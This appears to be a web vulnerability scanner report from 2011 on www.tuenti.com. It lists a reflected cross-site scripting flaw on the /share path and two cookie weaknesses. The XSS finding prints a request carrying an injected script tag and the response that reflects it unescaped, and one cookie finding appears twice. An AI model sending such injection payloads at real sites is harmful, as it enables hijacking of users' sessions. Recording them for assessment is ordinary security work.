1. Cross-site scripting (reflected)
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.tuenti.com | 
| Path: | /share | 
| GET /share?15a61"><script>alert(1)< Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close  | 
| HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Connection: close Date: Tue, 25 Jan 2011 04:39:29 GMT Content-Length: 39388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3 ...[SNIP]... <form method="post" action="?15a61"><script>alert(1)< ...[SNIP]...  | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.tuenti.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close  | 
| HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com X-Tuenti-State: logout Connection: close Date: Tue, 25 Jan 2011 04:39:17 GMT Content-Length: 1619 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]...  | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.tuenti.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close  | 
| HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com X-Tuenti-State: logout Connection: close Date: Tue, 25 Jan 2011 04:39:17 GMT Content-Length: 1619 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]...  |